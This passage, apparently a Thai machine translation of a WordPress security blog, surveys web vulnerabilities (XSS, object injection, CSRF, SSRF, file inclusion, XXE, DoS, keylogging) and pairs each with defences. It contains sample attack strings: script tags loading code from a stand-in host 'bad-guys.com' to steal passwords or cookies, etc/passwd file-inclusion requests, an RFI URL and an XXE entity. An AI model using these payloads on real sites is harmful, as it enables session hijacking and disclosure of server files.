แอปพลิเคชันตรวจสอบการรับรองความถูกต้องตามชุดพารามิเตอร์คงที่ ผู้โจมตีสามารถแก้ไขพารามิเตอร์เหล่านี้เพื่อเข้าถึงหน้าเว็บที่มักต้องมีการตรวจสอบสิทธิ์

ตัวอย่างพื้นฐานของบางสิ่งเช่นนี้คือพารามิเตอร์การตรวจสอบสิทธิ์ใน URL

 https:/my-website/some-plugint?param=authenticated&param=no

URL ด้านบนมีพารามิเตอร์การตรวจสอบสิทธิ์ที่มีค่าเท่ากับ ดังนั้นเมื่อเราเข้าชมหน้านี้ เราจะได้รับข้อความแจ้งว่าเราไม่ได้รับอนุญาตให้ดูข้อมูลในหน้านี้

อย่างไรก็ตาม หากการตรวจสอบความถูกต้องมีการเข้ารหัสไม่ดี ผู้โจมตีสามารถแก้ไขพารามิเตอร์การตรวจสอบสิทธิ์เพื่อเข้าถึงหน้าส่วนตัวได้

 https:/my-website/some-plugint?param=authenticated&param=yes

ในตัวอย่างนี้ แฮ็กเกอร์สามารถเปลี่ยนค่าการตรวจสอบสิทธิ์ใน URL เป็นใช่เพื่อข้ามข้อกำหนดการตรวจสอบสิทธิ์เพื่อดูหน้าเว็บ

วิธีป้องกันการป้องกันการเลี่ยงผ่านการตรวจสอบสิทธิ์

คุณสามารถช่วยปกป้องเว็บไซต์ของคุณจากช่องโหว่ของ Broken Authentication โดยใช้การตรวจสอบสิทธิ์แบบสองปัจจัย

2. ช่องโหว่แบ็คดอร์

ช่องโหว่ Backdoor ทำให้ทั้งผู้ใช้ที่ได้รับอนุญาตและไม่ได้รับอนุญาตสามารถหลีกเลี่ยงมาตรการรักษาความปลอดภัย WordPress ปกติและเข้าถึงคอมพิวเตอร์ เซิร์ฟเวอร์ เว็บไซต์ หรือแอปพลิเคชันระดับสูงได้

ตัวอย่างประตูหลัง

นักพัฒนาซอฟต์แวร์สร้างแบ็คดอร์เพื่อให้สามารถสลับไปมาระหว่างการเข้ารหัสและทดสอบโค้ดในฐานะผู้ดูแลระบบได้อย่างรวดเร็ว น่าเสียดายที่ผู้พัฒนาลืมลบแบ็คดอร์ก่อนที่ซอฟต์แวร์จะเผยแพร่สู่สาธารณะ

หากแฮ็กเกอร์พบแบ็คดอร์ พวกเขาสามารถใช้ประโยชน์จากจุดเริ่มต้นเพื่อให้ผู้ดูแลระบบเข้าถึงซอฟต์แวร์ได้ ตอนนี้แฮ็กเกอร์มีสิทธิ์การเข้าถึงระดับผู้ดูแลระบบแล้ว พวกเขาสามารถทำสิ่งที่เป็นอันตรายได้ทุกประเภท เช่น ฉีดมัลแวร์หรือขโมยข้อมูลที่สำคัญ

วิธีป้องกันแบ็คดอร์

แบ็คดอร์จำนวนมากสามารถสรุปได้เป็นประเด็นเดียว นั่นคือ การกำหนดค่าความปลอดภัยผิดพลาด ปัญหาการกำหนดค่าความปลอดภัยของ WordPress ผิดพลาดสามารถบรรเทาได้ด้วยการลบคุณสมบัติที่ไม่ได้ใช้ในโค้ด ทำให้ไลบรารีทั้งหมดเป็นปัจจุบัน และทำให้ข้อความแสดงข้อผิดพลาดทั่วไปมากขึ้น

3. PHP Object-Injection Vulnerability

สร้าง PHP ช่องโหว่วัตถุฉีดเกิดขึ้นกับผู้ใช้ส่งการป้อนข้อมูลที่ไม่ถูกสุขอนามัย (หมายถึงตัวละครที่ผิดกฎหมายจะไม่ถูกลบ) ก่อนที่จะถูกส่งผ่านไปยัง unserialized() ฟังก์ชัน PHP

ตัวอย่างการฉีดวัตถุ PHP

นี่คือตัวอย่างในโลกแห่งความเป็นจริงของช่องโหว่ PHP Object-Injection ในปลั๊กอิน WordPress ตัวจัดการโฆษณาตัวอย่าง ซึ่งเดิมรายงานโดย sumofpwn

ปัญหานี้เกิดจากการเรียก unserialize() ที่ ไม่ปลอดภัยสองครั้งในไฟล์ปลั๊กอิน sam-ajax-loader.php อินพุตถูกนำมาโดยตรงจากคำขอ POST ตามที่เห็นในรหัสด้านล่าง

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

ปัญหานี้อาจส่งผลให้ผู้โจมตีป้อนและเรียกใช้โค้ดที่เป็นอันตราย

วิธีป้องกัน PHP Object-Injection

อย่าใช้ unserialize() กับอินพุตที่ผู้ใช้ระบุ ให้ใช้ฟังก์ชัน JSON แทน

4. ช่องโหว่การเขียนสคริปต์ข้ามไซต์

ช่องโหว่ XSS หรือ Cross-Site Scripting เกิดขึ้นเมื่อเว็บแอปพลิเคชันอนุญาตให้ผู้ใช้เพิ่มโค้ดที่กำหนดเองในเส้นทาง URL ผู้โจมตีสามารถใช้ช่องโหว่เพื่อเรียกใช้โค้ดที่เป็นอันตรายในเว็บเบราว์เซอร์ของเหยื่อ สร้างการเปลี่ยนเส้นทางไปยังเว็บไซต์ที่เป็นอันตราย หรือจี้เซสชันผู้ใช้

XSS มีสามประเภทหลักซึ่งสะท้อนให้เห็น จัดเก็บและ DOM-Based

5. สะท้อนช่องโหว่ของการเขียนสคริปต์ข้ามไซต์

Reflected XSS หรือ Reflected Cross-Site Scripting เกิดขึ้นเมื่อมีการส่งสคริปต์ที่เป็นอันตรายในคำขอของไคลเอ็นต์ ซึ่งเป็นคำขอที่คุณทำในเบราว์เซอร์ ไปยังเซิร์ฟเวอร์และ สะท้อน กลับโดยเซิร์ฟเวอร์และดำเนินการโดยเบราว์เซอร์ของคุณ

ตัวอย่างการเขียนสคริปต์ข้ามไซต์ที่สะท้อนให้เห็น

สมมติว่า yourfavesite.com ต้องการให้คุณเข้าสู่ระบบเพื่อดูเนื้อหาบางส่วนของเว็บไซต์ และสมมุติว่าเว็บไซต์นี้ไม่สามารถเข้ารหัสอินพุตของผู้ใช้ได้อย่างถูกต้อง

ผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้โดยการสร้างลิงก์ที่เป็นอันตรายและแชร์กับผู้ใช้ yourfavesite.com ในอีเมลและโพสต์ในโซเชียลมีเดีย

ผู้โจมตีใช้เครื่องมือย่อ URL เพื่อทำให้ลิงก์ที่เป็นอันตรายดูไม่เป็นอันตรายและคลิกได้มาก yourfavesite.com/cool-stuff แต่เมื่อคุณคลิกลิงก์ที่สั้นลง เบราว์เซอร์ของคุณจะดำเนินการลิงก์แบบเต็ม yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js

หลังจากคลิกลิงก์ คุณจะถูกนำไปที่ yourfavesite.com และสคริปต์ที่เป็นอันตรายจะ สะท้อน กลับมาที่เบราว์เซอร์ของคุณ ทำให้ผู้โจมตีสามารถจี้เซสชันคุกกี้และบัญชี yourfavesite.com ของคุณได้

วิธีป้องกันการเขียนสคริปต์ข้ามไซต์ที่สะท้อนกลับมา

กฎ #5 ในเอกสารโกงการป้องกันการข้ามสคริปต์ของ OWASP คือการเข้ารหัส URL ก่อนที่จะแทรกข้อมูลที่ไม่น่าเชื่อถือลงในค่าพารามิเตอร์ HTML URL กฎนี้สามารถช่วยป้องกันการสร้างช่องโหว่ XSS ที่สะท้อนให้เห็นเมื่อเพิ่มข้อมูลที่ไม่น่าเชื่อถือลงในค่าพารามิเตอร์ HTTP GET

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. ช่องโหว่การเขียนสคริปต์ข้ามไซต์ที่เก็บไว้

ช่องโหว่ XSS ที่เก็บไว้ หรือ Stored Cross-Site Scripting ทำให้แฮกเกอร์สามารถแทรกโค้ดที่เป็นอันตรายลงในและ จัดเก็บ ไว้ในเซิร์ฟเวอร์ของเว็บแอปพลิเคชันได้

ตัวอย่างการเขียนสคริปต์ข้ามไซต์ที่เก็บไว้

ผู้โจมตีพบว่า yourfavesite.com อนุญาตให้ผู้เยี่ยมชมฝังแท็ก HTML ในส่วนความคิดเห็นของไซต์ ดังนั้นผู้โจมตีจึงสร้างความคิดเห็นใหม่:

บทความดีๆ! ลองดู <script src=”http://bad-guys.com/passwordstealingcode.js> บทความที่เกี่ยวข้องอื่น ๆ ที่เกี่ยวข้อง </script>

หมายเหตุ: ช่องโหว่ XSS ที่ สะท้อนให้เห็น จะต้องให้ผู้เยี่ยมชมคลิกลิงก์โค้ดที่เป็นอันตรายเพื่อดำเนินการ การโจมตี XSS ที่เก็บไว้ นั้นต้องการเฉพาะหน้าที่มีความคิดเห็นที่จะเข้าชมเท่านั้น โค้ดที่เป็นอันตรายทำงานทุกครั้งที่โหลดหน้าเว็บ

เมื่อคนร้ายของเราได้เพิ่มความคิดเห็น ผู้เยี่ยมชมหน้านี้ทุกคนในอนาคตจะถูกเปิดเผยสคริปต์ที่เป็นอันตรายของพวกเขา สคริปต์นี้โฮสต์อยู่ในเว็บไซต์ของคนเลวและมีความสามารถในการจี้คุกกี้เซสชันของผู้เข้าชมและบัญชี yourfavesite.com

วิธีป้องกันการจัดเก็บสคริปต์ข้ามไซต์

กฎข้อที่ #1 ในแผ่นโกงการป้องกันการข้ามสคริปต์ของ OWASP คือการเข้ารหัส HTML ก่อนเพิ่มข้อมูลที่ไม่น่าเชื่อถือลงในองค์ประกอบ HTML

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

การเข้ารหัสอักขระต่อไปนี้เพื่อ ป้องกันการสลับไปยังบริบทการดำเนินการใดๆ เช่น สคริปต์ ลักษณะ หรือตัวจัดการเหตุการณ์ แนะนำให้ใช้เอนทิตีฐานสิบหกในข้อมูลจำเพาะ

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. ช่องโหว่การเขียนสคริปต์ข้ามไซต์ตามโมเดลของอ็อบเจ็กต์เอกสาร

ช่องโหว่ XSS แบบอิง DOM หรือ Document Object Model-Based Cross-Site Scripting เกิดขึ้นเมื่อสคริปต์ฝั่งไคลเอ็นต์ของเว็บไซต์เขียนข้อมูลที่ผู้ใช้ระบุไปยัง Document Object Model (DOM) จากนั้นเว็บไซต์จะอ่านวันที่ผู้ใช้จาก DOM และส่งออกไปยังเว็บเบราว์เซอร์ของผู้เยี่ยมชม

หากข้อมูลที่ผู้ใช้ให้มาไม่ได้รับการจัดการอย่างเหมาะสม ผู้โจมตีอาจฉีดโค้ดที่เป็นอันตรายซึ่งจะถูกดำเนินการเมื่อเว็บไซต์อ่านโค้ดจาก DOM

หมายเหตุ: XSS ที่สะท้อนและเก็บไว้เป็นปัญหาฝั่งเซิร์ฟเวอร์ในขณะที่ XSS ที่ใช้ DOM เป็นปัญหาของไคลเอ็นต์ (เบราว์เซอร์)

ตัวอย่างการเขียนสคริปต์ข้ามไซต์ตามโมเดลของอ็อบเจ็กต์เอกสาร

วิธีทั่วไปในการอธิบายการโจมตี DOM XSS ในหน้าต้อนรับที่กำหนดเอง หลังจากสร้างบัญชีแล้ว สมมติว่า yourfavesite.com คุณถูกเปลี่ยนเส้นทางไปยังหน้าต้อนรับที่ปรับแต่งเพื่อต้อนรับคุณโดยใช้ชื่อโดยใช้รหัสด้านล่าง และชื่อผู้ใช้ถูกเข้ารหัสลงใน URL

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

ดังนั้น เราจะมี URL ของ yourfavesite.com/account?name=yourname

ผู้โจมตีสามารถทำการโจมตี XSS บน DOM ได้โดยส่ง URL ต่อไปนี้ไปยังผู้ใช้ใหม่:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

เมื่อผู้ใช้ใหม่คลิกลิงก์ เบราว์เซอร์จะส่งคำขอสำหรับ:

 /account?name=<script>alert(document.cookie)</script>

ไปที่ bad-guys.com เว็บไซต์ตอบกลับด้วยหน้าที่มีโค้ด Javascript ด้านบน

เบราว์เซอร์ของผู้ใช้ใหม่สร้างออบเจ็กต์ DOM สำหรับเพจ ซึ่งอ็อบเจ็กต์ document.location มีสตริง:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

โค้ดต้นฉบับในหน้าเว็บไม่ได้คาดหวังว่าพารามิเตอร์เริ่มต้นจะมีมาร์กอัป HTML ซึ่งสะท้อนมาร์กอัปบนหน้า จากนั้นเบราว์เซอร์ของผู้ใช้ใหม่จะแสดงหน้าเว็บและเรียกใช้สคริปต์ของผู้โจมตี:

 alert(document.cookie)

วิธีป้องกันการเขียนสคริปต์ข้ามไซต์บน DOM

กฎ #1 บน OWASP Dom-based cross-site scripting cheat sheet คือการหลีกเลี่ยง HTML จากนั้น JS จะหลบหนีก่อนที่จะเพิ่มข้อมูลที่ไม่น่าเชื่อถือลงในบริบทย่อย HTML ภายในบริบทการดำเนินการ

ตัวอย่างวิธีการ HTML ที่เป็นอันตราย:

คุณลักษณะ

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

วิธีการ

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

หากต้องการอัปเดต HTML แบบไดนามิกใน DOM safe OWASP ขอแนะนำ:

1. การเข้ารหัส HTML จากนั้น
2. JavaScript เข้ารหัสอินพุตที่ไม่น่าเชื่อถือทั้งหมด ดังแสดงในตัวอย่างเหล่านี้:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. ช่องโหว่การปลอมแปลงคำขอข้ามไซต์

ช่องโหว่ CSRF หรือ Cross-Site Request Forgery เกิดขึ้นเมื่ออาชญากรไซเบอร์หลอกให้ผู้ใช้ดำเนินการกระทำโดยไม่ได้ตั้งใจ ผู้โจมตีปลอมคำขอของผู้ใช้ไปยังแอปพลิเคชัน

ตัวอย่างการปลอมแปลงคำขอข้ามไซต์

ในรายงานสรุปช่องโหว่ของ WordPress มกราคม 2020 เรารายงานเกี่ยวกับช่องโหว่ของคำขอข้ามไซต์ที่พบในปลั๊กอิน Code Snippets (ปลั๊กอินได้รับการแก้ไขอย่างรวดเร็วในเวอร์ชัน 2.14.0)

การขาดการป้องกัน CRSF ของปลั๊กอินทำให้ทุกคนสามารถปลอมคำขอในนามของผู้ดูแลระบบและแทรกโค้ดที่ปฏิบัติการได้บนไซต์ที่มีช่องโหว่ ผู้โจมตีอาจใช้ประโยชน์จากจุดอ่อนนี้เพื่อรันโค้ดที่เป็นอันตรายและดำเนินการเข้ายึดเว็บไซต์โดยสมบูรณ์

วิธีป้องกันการปลอมแปลงคำขอข้ามไซต์

กรอบงานการเข้ารหัสส่วนใหญ่มีการป้องกันโทเค็นที่ซิงโครไนซ์ในตัวเพื่อป้องกัน CSRF และควรใช้

นอกจากนี้ยังมีส่วนประกอบภายนอกเช่น CSRF Protector Project ที่สามารถใช้เพื่อป้องกันช่องโหว่ของ PHP และ Apache CSRF

9. ช่องโหว่การปลอมแปลงคำขอฝั่งเซิร์ฟเวอร์

ช่องโหว่ SSRF หรือ Server-Site Request Forger ช่วยให้ผู้โจมตีหลอกลวงแอปพลิเคชันฝั่งเซิร์ฟเวอร์เพื่อส่งคำขอ HTTP ไปยังโดเมนที่เลือกได้ตามใจชอบ

ตัวอย่างการปลอมแปลงคำขอฝั่งเซิร์ฟเวอร์

ช่องโหว่ SSRF อาจถูกใช้ประโยชน์จากการโจมตี Reflected Cross-Site Scripting ผู้โจมตีสามารถดึงสคริปต์ที่เป็นอันตรายจาก bad-guys.com และให้บริการแก่ผู้เยี่ยมชมเว็บไซต์ทุกคน

วิธีป้องกันการปลอมแปลงคำขอฝั่งเซิร์ฟเวอร์

ขั้นตอนแรกในการบรรเทาช่องโหว่ SSRF คือการตรวจสอบอินพุต ตัวอย่างเช่น หากเซิร์ฟเวอร์ของคุณใช้ URL ที่ผู้ใช้ระบุในการดึงไฟล์ต่างๆ คุณควรตรวจสอบ URL และอนุญาตเฉพาะโฮสต์เป้าหมายที่คุณเชื่อถือเท่านั้น

สำหรับข้อมูลเพิ่มเติมเกี่ยวกับการป้องกัน SSRF โปรดดูเอกสารสรุป OWASP

10. ช่องโหว่ในการยกระดับสิทธิ์

ช่องโหว่ Privilege Escalation ทำให้ผู้โจมตีสามารถดำเนินการงานที่ปกติต้องการสิทธิ์ระดับสูงได้

ตัวอย่างการเพิ่มสิทธิพิเศษ

ในบทสรุปช่องโหว่ WordPress เดือนพฤศจิกายน 2020 เรารายงานเกี่ยวกับช่องโหว่ในการยกระดับสิทธิ์ที่พบในปลั๊กอิน Ultimate Member (ช่องโหว่ได้รับการแก้ไขในเวอร์ชัน 2.1.12)

ผู้โจมตีสามารถจัดหาพารามิเตอร์อาร์เรย์สำหรับเมตาผู้ใช้ wp_capabilities ซึ่งกำหนดบทบาทของผู้ใช้ ในระหว่างขั้นตอนการลงทะเบียน รายละเอียดการลงทะเบียนที่ส่งจะถูกส่งต่อไปยังฟังก์ชัน update_profile และข้อมูลเมตาที่เกี่ยวข้องที่ส่งมา ไม่ว่าจะส่งอะไร จะได้รับการอัปเดตสำหรับผู้ใช้ที่ลงทะเบียนใหม่

ช่องโหว่ดังกล่าวทำให้ผู้ใช้ใหม่สามารถร้องขอผู้ดูแลระบบเมื่อลงทะเบียนได้

วิธีป้องกันการเลื่อนระดับสิทธิ์

iThemes Security Pro สามารถช่วยปกป้องเว็บไซต์ของคุณจาก Broken Access Control ได้โดยการจำกัดการเข้าถึงของผู้ดูแลระบบในรายการอุปกรณ์ที่เชื่อถือได้

11. ช่องโหว่ในการเรียกใช้โค้ดจากระยะไกล

ช่องโหว่ RCE หรือ Remote Code Execution ช่วยให้ผู้โจมตีเข้าถึงและทำการเปลี่ยนแปลงและแม้กระทั่งเข้าควบคุมคอมพิวเตอร์หรือเซิร์ฟเวอร์

ตัวอย่างการดำเนินการโค้ดจากระยะไกล

ในปี 2018 Microsoft ได้เปิดเผยช่องโหว่ในการเรียกใช้โค้ดจากระยะไกลที่พบใน Excel

ผู้โจมตีที่ใช้ประโยชน์จากช่องโหว่ได้สำเร็จสามารถเรียกใช้รหัสโดยอำเภอใจในบริบทของผู้ใช้ปัจจุบัน หากผู้ใช้ปัจจุบันเข้าสู่ระบบด้วยสิทธิ์ผู้ดูแลระบบ ผู้โจมตีอาจเข้าควบคุมระบบที่ได้รับผลกระทบ ผู้โจมตีสามารถติดตั้งโปรแกรมได้ ดู เปลี่ยนแปลง หรือลบข้อมูล หรือสร้างบัญชีใหม่พร้อมสิทธิ์ผู้ใช้เต็มรูปแบบ ผู้ใช้ที่บัญชีได้รับการกำหนดค่าให้มีสิทธิ์ผู้ใช้น้อยกว่าในระบบอาจได้รับผลกระทบน้อยกว่าผู้ใช้ที่ดำเนินการด้วยสิทธิ์ผู้ใช้ที่เป็นผู้ดูแลระบบ

วิธีป้องกันการเรียกใช้โค้ดจากระยะไกล

วิธีที่ง่ายที่สุดในการบรรเทาช่องโหว่ RCE คือการตรวจสอบความถูกต้องของผู้ใช้โดยการกรองและลบอักขระที่ไม่ต้องการ

Liquid Web บริษัทแม่ของเรามีบทความดีๆ เกี่ยวกับการป้องกันการใช้โค้ดจากระยะไกล

14. ช่องโหว่ในการรวมไฟล์

ช่องโหว่ File Inclusion เกิดขึ้นเมื่อเว็บแอปพลิเคชันอนุญาตให้ผู้ใช้ส่งข้อมูลเข้าในไฟล์หรืออัปโหลดไฟล์ไปยังเซิร์ฟเวอร์

ช่องโหว่ในการรวมไฟล์มีอยู่ 2 ประเภท คือ Local และ Remote

15. ช่องโหว่การรวมไฟล์ในเครื่อง

ช่องโหว่ LFI หรือ Local File Inclusion ทำให้ผู้โจมตีสามารถอ่านและเรียกใช้ไฟล์ในบางครั้งบนเซิร์ฟเวอร์ของเว็บไซต์ได้

ตัวอย่างการรวมไฟล์ในเครื่อง

ลองมาดูอีก yourfavesite.com ที่เส้นทางผ่านไปยัง include งบจะไม่ชัดเจนพอ ตัวอย่างเช่น ลองดูที่ URL ด้านล่าง

 yourfavesite.com/module.php?file=example.file

ผู้โจมตีสามารถเปลี่ยนพารามิเตอร์ URL เพื่อเข้าถึงไฟล์ที่กำหนดเองบนเซิร์ฟเวอร์ได้

 yourfavesite.com/module.php?file=etc/passwd

การเปลี่ยนค่าของไฟล์ใน URL อาจทำให้ผู้โจมตีดูเนื้อหาของไฟล์ psswd ได้

วิธีป้องกันการรวมไฟล์ในเครื่อง

สร้างรายการที่อนุญาตของไฟล์ที่หน้าอาจมี จากนั้นใช้ตัวระบุเพื่อเข้าถึงไฟล์ที่เลือก จากนั้นบล็อกคำขอที่มีตัวระบุที่ไม่ถูกต้อง

16. ช่องโหว่การรวมไฟล์ระยะไกล

ช่องโหว่ RFI หรือ Remote File Inclusion ช่วยให้ผู้โจมตีสามารถรวมไฟล์ได้ โดยปกติแล้วจะใช้ประโยชน์จากกลไก "การรวมไฟล์แบบไดนามิก" ที่ใช้ในแอปพลิเคชันเป้าหมาย

ตัวอย่างการรวมไฟล์ระยะไกล

ปลั๊กอิน WordPress WP พร้อม Spritz ถูกปิดในที่เก็บ WordPress.org เนื่องจากมีช่องโหว่ RFI

ด้านล่างนี้คือซอร์สโค้ดของช่องโหว่:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

โค้ดนี้สามารถใช้ประโยชน์ได้โดยการเปลี่ยนค่าของค่า content.filter.php?url= ตัวอย่างเช่น:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

การป้องกันการรวมไฟล์ระยะไกล

สร้างรายการที่อนุญาตของไฟล์ที่หน้าอาจมี จากนั้นใช้ตัวระบุเพื่อเข้าถึงไฟล์ที่เลือก จากนั้นบล็อกคำขอที่มีตัวระบุที่ไม่ถูกต้อง

17. ช่องโหว่การข้ามผ่านไดเรกทอรี

ช่องโหว่ Directory Traversal หรือ File Traversal ทำให้ผู้โจมตีสามารถอ่านไฟล์ที่กำหนดเองบนเซิร์ฟเวอร์ที่กำลังเรียกใช้แอปพลิเคชัน

ตัวอย่างการข้ามผ่านไดเรกทอรี

WordPress เวอร์ชัน 5.7 – 5.03 เสี่ยงต่อการโจมตีแบบ Directory Traversal เนื่องจากไม่สามารถตรวจสอบข้อมูลที่ผู้ใช้ป้อนได้อย่างถูกต้อง ผู้โจมตีที่เข้าถึงบัญชีที่มีสิทธิ์ของ author อย่างน้อยสามารถใช้ประโยชน์จากช่องโหว่การข้ามผ่านไดเรกทอรีและเรียกใช้โค้ด PHP ที่เป็นอันตรายบนเซิร์ฟเวอร์ที่เกี่ยวข้อง ซึ่งนำไปสู่การยึดครองจากระยะไกลอย่างสมบูรณ์

วิธีป้องกันการข้ามผ่านไดเรกทอรี

นักพัฒนาสามารถใช้ดัชนีแทนส่วนจริงของชื่อไฟล์เมื่อสร้างเทมเพลตหรือใช้ไฟล์ภาษา

18. ช่องโหว่การเปลี่ยนเส้นทางที่เป็นอันตราย

ช่องโหว่การ เปลี่ยนเส้นทางที่ เป็น อันตราย ทำให้ผู้โจมตีสามารถใส่โค้ดเพื่อเปลี่ยนเส้นทางผู้เยี่ยมชมเว็บไซต์ไปยังเว็บไซต์อื่นได้

ตัวอย่างการเปลี่ยนเส้นทางที่เป็นอันตราย

สมมติว่าคุณกำลังมองหาเสื้อสเวตเตอร์สีน้ำเงินโดยใช้เครื่องมือค้นหาในร้านบูติกออนไลน์

ขออภัย เซิร์ฟเวอร์ของบูติกไม่สามารถเข้ารหัสอินพุตของผู้ใช้ได้อย่างถูกต้อง และผู้โจมตีสามารถแทรกสคริปต์การเปลี่ยนเส้นทางที่เป็นอันตรายลงในคำค้นหาของคุณได้

ดังนั้น เมื่อคุณพิมพ์เสื้อสเวตเตอร์สีน้ำเงินลงในช่องค้นหาของร้านบูติกแล้วกด Enter คุณจะไปสิ้นสุดที่หน้าเว็บของผู้โจมตีแทนที่จะเป็นหน้าของร้านที่มีเสื้อสเวตเตอร์ที่ตรงกับคำอธิบายการค้นหาของคุณ

วิธีป้องกันการเปลี่ยนเส้นทางที่เป็นอันตราย

คุณสามารถป้องกันการเปลี่ยนเส้นทางที่เป็นอันตรายได้โดยการล้างข้อมูลของผู้ใช้ ตรวจสอบ URL และได้รับการยืนยันจากผู้เยี่ยมชมสำหรับการเปลี่ยนเส้นทางนอกไซต์ทั้งหมด

19. ช่องโหว่เอนทิตีภายนอก XML

ช่องโหว่ XXE หรือ XML External Entity ช่วยให้ผู้โจมตีหลอกล่อให้ XML parser ส่งข้อมูลที่สำคัญไปยังเอนทิตีภายนอกภายใต้การควบคุมของตน

ตัวอย่างเอนทิตีภายนอก XML

ผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่ XXE เพื่อเข้าถึงไฟล์ที่มีความละเอียดอ่อน เช่น etc/passwd ซึ่งเก็บข้อมูลบัญชีผู้ใช้

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

วิธีป้องกัน XML เอนทิตีภายนอก

วิธีที่ดีที่สุดในการป้องกัน XXE คือการใช้รูปแบบข้อมูลที่ซับซ้อนน้อยกว่า เช่น JSON และหลีกเลี่ยงการทำให้เป็นอนุกรมของข้อมูลที่ละเอียดอ่อน

20. การโจมตีการปฏิเสธการบริการ

การ โจมตี DoS หรือ Denial-of-Service เป็นความพยายามโดยเจตนาเพื่อทำให้เว็บไซต์หรือแอปพลิเคชันของคุณไม่พร้อมใช้งานสำหรับผู้ใช้โดยทำให้ปริมาณการใช้เครือข่ายท่วมท้น

ใน การ โจมตี DDoS Distributed Denial of Service ผู้โจมตีใช้หลายแหล่งเพื่อทำให้เครือข่ายมีการรับส่งข้อมูล ผู้โจมตีจะจี้กลุ่มคอมพิวเตอร์ เราเตอร์ และอุปกรณ์ IoT ที่ติดมัลแวร์เพื่อเพิ่มปริมาณการรับส่งข้อมูล

ตัวอย่างการโจมตีการปฏิเสธบริการ

การโจมตี DDoS (Distributed Denial-of-Service) ที่ใหญ่ที่สุดเท่าที่เคยมีมา ถูกเรียกเก็บกับ AWS ในเดือนกุมภาพันธ์ของปีนี้ Amazon รายงานว่า AWS Shield ซึ่งเป็นบริการป้องกันภัยคุกคามที่มีการจัดการของพวกเขา ได้สังเกตและลดการโจมตี DDoS ขนาดใหญ่นี้ การโจมตีกินเวลา 3 วันและสูงสุดที่ 2.3 เทราไบต์ต่อวินาที

วิธีป้องกันการปฏิเสธบริการโจมตี

มี 2 ​​วิธีหลักในการลดการโจมตี DoS

1. ซื้อโฮสติ้งมากกว่าที่คุณต้องการ การมีทรัพยากรเพิ่มเติมในการกำจัดสามารถช่วยให้คุณรับมือกับความต้องการที่เพิ่มขึ้นที่เกิดจากการโจมตี DoS
2. ใช้ไฟร์วอลล์ระดับเซิร์ฟเวอร์เช่น Cloudflare ไฟร์วอลล์สามารถตรวจจับการเข้าชมที่เพิ่มขึ้นอย่างผิดปกติและป้องกันไม่ให้เว็บไซต์ของคุณทำงานหนักเกินไป

21. การบันทึกการกดแป้นพิมพ์

การบันทึกการกดแป้นพิมพ์ หรือที่เรียกว่า การล็อก คีย์หรือการดักจับแป้นพิมพ์ เกิดขึ้นเมื่อแฮ็กเกอร์ตรวจสอบและบันทึกการกดแป้นพิมพ์ของผู้เยี่ยมชมเว็บไซต์อย่างลับๆ

ตัวอย่างการบันทึกการกดแป้นพิมพ์

ในปี 2560 แฮ็กเกอร์ประสบความสำเร็จในการติดตั้ง JavaScript ที่เป็นอันตรายบนเซิร์ฟเวอร์ของผู้ผลิตสมาร์ทโฟน OnePlus

ผู้โจมตีใช้รหัสที่เป็นอันตรายเพื่อติดตามและบันทึกการกดแป้นของลูกค้า OnePlus ขณะที่ป้อนรายละเอียดบัตรเครดิต แฮกเกอร์บันทึกและรวบรวมการกดแป้นพิมพ์ของลูกค้า 40,000 รายก่อนที่ OnePlus จะตรวจพบและแก้ไขการแฮ็ก

วิธีป้องกันการบันทึกการกดแป้นพิมพ์

อัพเดททุกอย่าง! โดยทั่วไปแล้ว ผู้โจมตีจะต้องใช้ช่องโหว่อื่นที่มีอยู่เพื่อฉีดคีย์ล็อกเกอร์บนคอมพิวเตอร์หรือเซิร์ฟเวอร์ การอัปเดตทุกอย่างด้วยแพตช์ความปลอดภัยล่าสุดจะป้องกันไม่ให้แฮกเกอร์ติดตั้งคีย์ล็อกเกอร์บนเว็บไซต์หรือคอมพิวเตอร์ของคุณได้ง่ายๆ

โบนัส: ฟิชชิ่ง

ช่องโหว่ของซอฟต์แวร์เป็นสิ่งเดียวที่แฮ็กเกอร์และอาชญากรไซเบอร์พยายามใช้ประโยชน์ แฮกเกอร์ยังกำหนดเป้าหมายและหาประโยชน์จากมนุษย์อีกด้วย วิธีการหาประโยชน์ทั่วไปวิธีหนึ่งคือฟิชชิ่ง

ฟิชชิ่งคืออะไร?

